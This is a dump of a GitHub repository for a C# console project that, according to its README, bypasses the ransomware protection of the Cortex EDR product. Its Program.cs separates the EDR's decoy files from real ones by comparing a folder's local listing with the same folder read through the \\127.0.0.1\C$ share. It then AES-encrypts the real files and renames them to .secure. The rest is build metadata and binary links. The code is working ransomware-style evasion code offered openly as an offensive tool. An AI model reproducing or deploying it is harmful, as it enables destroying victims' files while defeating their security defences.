├── .vs
└── ConsoleApp1
│ ├── FileContentIndex
│ ├── 7c2665b2-59b8-401d-b31d-c208e8626a13.vsidx
│ └── read.lock
│ └── v17
│ └── .suo
├── ConsoleApp1.sln
├── ConsoleApp1
├── App.config
├── ConsoleApp1.csproj
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── bin
│ ├── Debug
│ │ ├── ConsoleApp1.exe
│ │ ├── ConsoleApp1.exe.config
│ │ └── ConsoleApp1.pdb
│ └── Release
│ │ ├── ConsoleApp1.exe
│ │ ├── ConsoleApp1.exe.config
│ │ └── ConsoleApp1.pdb
└── obj
│ ├── Debug
│ ├── .NETFramework,Version=v4.6.1.AssemblyAttributes.cs
│ ├── ConsoleApp1.csproj.AssemblyReference.cache
│ ├── ConsoleApp1.csproj.CoreCompileInputs.cache
│ ├── ConsoleApp1.csproj.FileListAbsolute.txt
│ ├── ConsoleApp1.csproj.SuggestedBindingRedirects.cache
│ ├── ConsoleApp1.exe
│ ├── ConsoleApp1.pdb
│ └── DesignTimeResolveAssemblyReferencesInput.cache
│ └── Release
│ ├── .NETFramework,Version=v4.6.1.AssemblyAttributes.cs
│ ├── ConsoleApp1.csproj.AssemblyReference.cache
│ ├── ConsoleApp1.csproj.CoreCompileInputs.cache
│ ├── ConsoleApp1.csproj.FileListAbsolute.txt
│ ├── ConsoleApp1.csproj.SuggestedBindingRedirects.cache
│ ├── ConsoleApp1.exe
│ ├── ConsoleApp1.pdb
│ └── DesignTimeResolveAssemblyReferencesInput.cache
└── README.md
/.vs/ConsoleApp1/FileContentIndex/7c2665b2-59b8-401d-b31d-c208e8626a13.vsidx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/.vs/ConsoleApp1/FileContentIndex/7c2665b2-59b8-401d-b31d-c208e8626a13.vsidx
--------------------------------------------------------------------------------
/.vs/ConsoleApp1/FileContentIndex/read.lock:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/.vs/ConsoleApp1/FileContentIndex/read.lock
--------------------------------------------------------------------------------
/.vs/ConsoleApp1/v17/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/.vs/ConsoleApp1/v17/.suo
--------------------------------------------------------------------------------
/ConsoleApp1.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.6.33723.286
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ConsoleApp1", "ConsoleApp1\ConsoleApp1.csproj", "{06539075-2F37-441E-86D0-F46E1AA8D57A}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {06539075-2F37-441E-86D0-F46E1AA8D57A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {06539075-2F37-441E-86D0-F46E1AA8D57A}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {06539075-2F37-441E-86D0-F46E1AA8D57A}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {06539075-2F37-441E-86D0-F46E1AA8D57A}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {3A5AA5E9-448D-4475-BFE6-D63F1C97FB65}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/ConsoleApp1/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/ConsoleApp1/ConsoleApp1.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {06539075-2F37-441E-86D0-F46E1AA8D57A}
8 | Exe
9 | ConsoleApp1
10 | ConsoleApp1
11 | v4.6.1
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/ConsoleApp1/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 | using System.Linq;
5 | using System.Security.Cryptography;
6 | using static System.Net.WebRequestMethods;
7 |
8 | class Program
9 | {
10 | static List decoyFiles = new List();
11 | static List realFiles = new List();
12 |
13 | static void CompareFiles(string[] files1, string[] files2)
14 | {
15 | foreach (var file1 in files1)
16 | {
17 | bool found = false;
18 | foreach (var file2 in files2)
19 | {
20 | if (Path.GetFileName(file1) == Path.GetFileName(file2)) // Only comparing file names
21 | {
22 | found = true;
23 | realFiles.Add(file1);
24 | break;
25 | }
26 | }
27 |
28 | if (!found)
29 | {
30 | decoyFiles.Add(file1);
31 | }
32 | }
33 | }
34 |
35 | static void EncryptFile(string filePath)
36 | {
37 | try
38 | {
39 | if (Path.GetExtension(filePath).Equals(".exe", StringComparison.OrdinalIgnoreCase))
40 | {
41 | Console.WriteLine("Skipping encryption for executable files.");
42 | return;
43 | }
44 |
45 | using (Aes aes = Aes.Create())
46 | {
47 | aes.KeySize = 256;
48 | aes.GenerateKey();
49 | aes.GenerateIV();
50 |
51 | byte[] key = aes.Key;
52 | byte[] iv = aes.IV;
53 |
54 | // Read original file content
55 | byte[] fileContent = System.IO.File.ReadAllBytes(filePath);
56 |
57 | using (FileStream outputFileStream = new FileStream(filePath, FileMode.Create, FileAccess.Write))
58 | using (CryptoStream cryptoStream = new CryptoStream(outputFileStream, aes.CreateEncryptor(), CryptoStreamMode.Write))
59 | {
60 | outputFileStream.Write(key, 0, key.Length); // Store key (should use secure storage instead)
61 | outputFileStream.Write(iv, 0, iv.Length); // Store IV
62 | cryptoStream.Write(fileContent, 0, fileContent.Length);
63 | }
64 | }
65 |
66 | // Rename the file to .secure extension (corrected File.Move syntax)
67 | string newFilePath = Path.ChangeExtension(filePath, ".secure");
68 | System.IO.File.Move(filePath, newFilePath);
69 |
70 | Console.WriteLine($"File encrypted successfully: {newFilePath}");
71 | }
72 | catch (Exception ex)
73 | {
74 | Console.WriteLine($"Error: {ex.Message}");
75 | }
76 | }
77 |
78 | static void Main()
79 | {
80 |
81 | string targetDirectory = @"\\127.0.0.1\C$\" + Directory.GetCurrentDirectory().Replace("C:\\","");
82 |
83 |
84 | string[] files1 = Directory.GetFiles(Directory.GetCurrentDirectory());
85 |
86 | string[] files2 = Directory.GetFiles(targetDirectory);
87 |
88 | CompareFiles(files1, files2);
89 |
90 | foreach (var file1 in decoyFiles)
91 | {
92 | Console.WriteLine($"File '{Path.GetFileName(file1)}' is a decoy !");
93 | }
94 | Console.WriteLine("============================ Real Files =======================");
95 | foreach (var file1 in realFiles)
96 | {
97 | Console.WriteLine($"File '{Path.GetFileName(file1)}' is a real encrypting ..... !");
98 | EncryptFile(file1);
99 | }
100 |
101 |
102 |
103 | Console.ReadLine();
104 | }
105 | }
106 |
--------------------------------------------------------------------------------
/ConsoleApp1/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("ConsoleApp1")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ConsoleApp1")]
13 | [assembly: AssemblyCopyright("Copyright © 2025")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("06539075-2f37-441e-86d0-f46e1aa8d57a")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/ConsoleApp1/bin/Debug/ConsoleApp1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/bin/Debug/ConsoleApp1.exe
--------------------------------------------------------------------------------
/ConsoleApp1/bin/Debug/ConsoleApp1.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/ConsoleApp1/bin/Debug/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/bin/Debug/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/ConsoleApp1/bin/Release/ConsoleApp1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/bin/Release/ConsoleApp1.exe
--------------------------------------------------------------------------------
/ConsoleApp1/bin/Release/ConsoleApp1.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/ConsoleApp1/bin/Release/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/bin/Release/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/ConsoleApp1/obj/Debug/.NETFramework,Version=v4.6.1.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6.1", FrameworkDisplayName = ".NET Framework 4.6.1")]
5 |
--------------------------------------------------------------------------------
/ConsoleApp1/obj/Debug/ConsoleApp1.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/obj/Debug/ConsoleApp1.csproj.AssemblyReference.cache
--------------------------------------------------------------------------------
/ConsoleApp1/obj/Debug/ConsoleApp1.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | d5c660b065a06c458ab35a0b64f95402c8c1f5c5
2 |
--------------------------------------------------------------------------------
/ConsoleApp1/obj/Debug/ConsoleApp1.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\bin\Debug\ConsoleApp1.exe.config
2 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\bin\Debug\ConsoleApp1.exe
3 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\bin\Debug\ConsoleApp1.pdb
4 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\obj\Debug\ConsoleApp1.csproj.AssemblyReference.cache
5 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\obj\Debug\ConsoleApp1.csproj.SuggestedBindingRedirects.cache
6 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\obj\Debug\ConsoleApp1.csproj.CoreCompileInputs.cache
7 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\obj\Debug\ConsoleApp1.exe
8 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\obj\Debug\ConsoleApp1.pdb
9 |
--------------------------------------------------------------------------------
/ConsoleApp1/obj/Debug/ConsoleApp1.csproj.SuggestedBindingRedirects.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/obj/Debug/ConsoleApp1.csproj.SuggestedBindingRedirects.cache
--------------------------------------------------------------------------------
/ConsoleApp1/obj/Debug/ConsoleApp1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/obj/Debug/ConsoleApp1.exe
--------------------------------------------------------------------------------
/ConsoleApp1/obj/Debug/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/obj/Debug/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/ConsoleApp1/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/ConsoleApp1/obj/Release/.NETFramework,Version=v4.6.1.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6.1", FrameworkDisplayName = ".NET Framework 4.6.1")]
5 |
--------------------------------------------------------------------------------
/ConsoleApp1/obj/Release/ConsoleApp1.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/obj/Release/ConsoleApp1.csproj.AssemblyReference.cache
--------------------------------------------------------------------------------
/ConsoleApp1/obj/Release/ConsoleApp1.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | be4a5e5016ee5ea0374c3ab86bc4266f6ee19d4c
2 |
--------------------------------------------------------------------------------
/ConsoleApp1/obj/Release/ConsoleApp1.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\bin\Release\ConsoleApp1.exe.config
2 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\bin\Release\ConsoleApp1.exe
3 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\bin\Release\ConsoleApp1.pdb
4 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\obj\Release\ConsoleApp1.csproj.AssemblyReference.cache
5 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\obj\Release\ConsoleApp1.csproj.SuggestedBindingRedirects.cache
6 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\obj\Release\ConsoleApp1.csproj.CoreCompileInputs.cache
7 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\obj\Release\ConsoleApp1.exe
8 | C:\Users\hathh\Desktop\New folder (2)\ConsoleApp1\ConsoleApp1\obj\Release\ConsoleApp1.pdb
9 |
--------------------------------------------------------------------------------
/ConsoleApp1/obj/Release/ConsoleApp1.csproj.SuggestedBindingRedirects.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/obj/Release/ConsoleApp1.csproj.SuggestedBindingRedirects.cache
--------------------------------------------------------------------------------
/ConsoleApp1/obj/Release/ConsoleApp1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/obj/Release/ConsoleApp1.exe
--------------------------------------------------------------------------------
/ConsoleApp1/obj/Release/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/obj/Release/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/ConsoleApp1/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/casp3r0x0/CortexRansomBypass/06fe75c195db74ed033cd6d35550519d41f2aaa8/ConsoleApp1/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ## Cortex EDR Randomware protection bypass
2 |
3 |
4 | this is an implementation of cortex EDR ransomware protection bypass
5 |
6 |
7 | you can find the full blog at:
8 |
9 |
10 | [https://www.pwntricks.com/Bypass-cortex-ransomware-protection](https://www.pwntricks.com/Bypass-cortex-ransomware-protection)
11 |
--------------------------------------------------------------------------------